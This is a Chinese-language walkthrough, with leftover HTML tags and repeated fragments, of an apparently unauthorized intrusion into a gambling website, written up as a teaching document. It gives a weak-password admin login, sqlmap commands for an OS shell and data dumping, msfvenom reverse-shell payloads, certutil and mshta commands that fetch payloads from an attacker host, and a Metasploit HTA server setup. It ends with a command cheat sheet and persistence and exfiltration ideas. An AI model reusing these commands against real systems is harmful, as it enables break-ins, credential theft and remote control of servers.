菠菜站渗透测试实战教学文档<\/h1>

1. 前期准备<\/h2>

1.1 目标信息收集<\/h3>

目标类型：菠菜（博彩）网站<\/li>
特点：通常安全防护较弱，但数据价值高<\/li>

管理员安全意识评估：使用弱密码（admin\/123456）<\/li> <\/ul>

1.2 工具准备<\/h3>

SQLMap：自动化SQL注入工具<\/li>
Cobalt Strike (CS)：后渗透测试框架<\/li>
Metasploit Framework (MSF)：渗透测试框架<\/li>

Nmap：端口扫描工具<\/li> <\/ul>

2. 渗透过程详解<\/h2>

2.1 初始访问<\/h3>

2.1.1 弱口令攻击<\/h4>

尝试常用弱口令组合：admin\/123456<\/li>

成功进入后台，表明管理员安全意识薄弱<\/li> <\/ul>

2.1.2 SQL注入利用<\/h4>

确认存在SQL注入漏洞（参考FreeBuf文章）<\/li>

使用SQLMap进行自动化注入：

sqlmap -r sql.txt --dbms mssql --os-shell
<\/span><\/span><\/code><\/pre>
-r<\/code>：从文件中读取HTTP请求<\/li>
--dbms mssql<\/code>：指定数据库类型为MSSQL<\/li>
--os-shell<\/code>：尝试获取操作系统shell<\/li>
<\/ul>
<\/li>
<\/ol>
2.2 权限维持<\/h3>
2.2.1 无文件上线技术<\/h4>

通过SQL注入获取的os-shell<\/code>执行CS的无文件上线命令<\/li>
系统信息收集：

确认是某云服务器<\/li>
无域环境<\/li>
检查系统补丁情况<\/li>
<\/ul>
<\/li>
<\/ol>
2.2.2 配置文件获取<\/h4>

下载Web.config文件，可能包含敏感信息（如数据库凭据）<\/li>
本例中发现了sa账户密码但提权失败<\/li>
<\/ul>
2.3 提权尝试<\/h3>
2.3.1 CS自带提权模块<\/h4>

尝试了CS内置的各种提权方法<\/li>
全部失败，表明系统补丁较新<\/li>
<\/ul>
2.3.2 转向MSF提权<\/h4>

进程分析：

使用在线工具识别杀软进程<\/li>
确认无杀软干扰<\/li>
<\/ul>
<\/li>
文件上传尝试：

使用msfvenom生成后门：
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><PORT> -f exe > payload.exe
<\/span><\/span><\/code><\/pre><\/li>
上传失败，可能是权限或策略限制<\/li>
<\/ul>
<\/li>
替代方案：certutil下载
certutil -urlcache -split -f http:\/\/<IP>\/payload.exe payload.exe
<\/span><\/span><\/code><\/pre>
同样失败，表明下载限制<\/li>
<\/ul>
<\/li>
<\/ol>
2.3.3 无落地文件攻击<\/h4>

MSF HTA服务器模块：
use exploit\/windows\/misc\/hta_server
<\/span><\/span>set payload windows\/meterpreter\/reverse_http
<\/span><\/span>set lhost <IP>
<\/span><\/span>set lport <PORT>
<\/span><\/span>exploit -j
<\/span><\/span><\/code><\/pre><\/li>
生成HTA链接，通过mshta<\/code>命令执行：
mshta http:\/\/<IP>\/payload.hta
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.4 其他潜在攻击面<\/h3>

Nmap扫描发现的其他服务（未深入）<\/li>
文件系统未彻底检查（可能存在敏感信息）<\/li>
<\/ul>
3. 技术总结<\/h2>
3.1 成功点<\/h3>

弱口令利用：admin\/123456快速进入后台<\/li>
SQL注入利用：使用已知漏洞快速获取os-shell<\/li>
无文件攻击：绕过上传下载限制<\/li>
<\/ol>
3.2 失败点<\/h3>

提权失败：系统补丁完整，常规提权方法无效<\/li>
文件传输限制：无法直接上传\/下载文件<\/li>
<\/ol>
3.3 改进建议<\/h3>

提权技术：

研究更多Windows提权技术（如令牌窃取、服务漏洞等）<\/li>
学习使用PowerUp等提权工具<\/li>
<\/ul>
<\/li>
文件传输绕过：

尝试编码传输（如base64）<\/li>
使用DNS或ICMP等非常规通道<\/li>
<\/ul>
<\/li>
持久化：

研究更多持久化技术（计划任务、WMI事件等）<\/li>
<\/ul>
<\/li>
<\/ol>
4. 防御建议<\/h2>
4.1 管理员层面<\/h3>

禁用常见弱口令，使用强密码策略<\/li>
及时更新系统和应用补丁<\/li>
限制数据库权限（避免使用sa账户）<\/li>
<\/ol>
4.2 系统配置<\/h3>

限制文件上传\/下载功能<\/li>
配置适当的文件系统权限<\/li>
部署杀毒软件和入侵检测系统<\/li>
<\/ol>
4.3 代码安全<\/h3>

修复已知SQL注入漏洞<\/li>
实施输入验证和参数化查询<\/li>
敏感配置文件加密存储<\/li>
<\/ol>
5. 参考资源<\/h2>

FreeBuf SQL注入相关文章<\/li>
Cobalt Strike官方文档<\/li>
Metasploit模块文档<\/li>
Windows提权技术大全<\/li>
<\/ul>
附录：常用命令速查<\/h2>
SQLMap<\/h3>
# 基本检测<\/span>
<\/span><\/span>sqlmap -r request.txt
<\/span><\/span>
<\/span><\/span># 获取os-shell<\/span>
<\/span><\/span>sqlmap -r request.txt --dbms mssql --os-shell
<\/span><\/span>
<\/span><\/span># 数据提取<\/span>
<\/span><\/span>sqlmap -r request.txt --dbms mssql --dump
<\/span><\/span><\/code><\/pre>MSFvenom<\/h3>
# 生成Windows后门<\/span>
<\/span><\/span>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><PORT> -f exe > payload.exe
<\/span><\/span>
<\/span><\/span># 生成HTA<\/span>
<\/span><\/span>msfvenom -p windows\/meterpreter\/reverse_http LHOST=<\/span><IP> LPORT=<\/span><PORT> -f hta-psh > payload.hta
<\/span><\/span><\/code><\/pre>Certutil下载<\/h3>
certutil -urlcache -split -f http:\/\/<IP>\/payload.exe payload.exe
<\/span><\/span><\/code><\/pre>

菠菜站渗透测试实战教学文档<\/h1>

1. 前期准备<\/h2>

2. 渗透过程详解<\/h2>

2.1 初始访问<\/h3>

2.2 权限维持<\/h3>

2.3 提权尝试<\/h3>

3. 技术总结<\/h2>

4. 防御建议<\/h2>

附录：常用命令速查<\/h2>

Certutil下载<\/h3> certutil -urlcache -split -f http:\/\/<IP>\/payload.exe payload.exe <\/span><\/span><\/code><\/pre>

Certutil下载<\/h3>
`certutil -urlcache -split -f http:\/\/<IP>\/payload.exe payload.exe <\/span><\/span><\/code><\/pre>`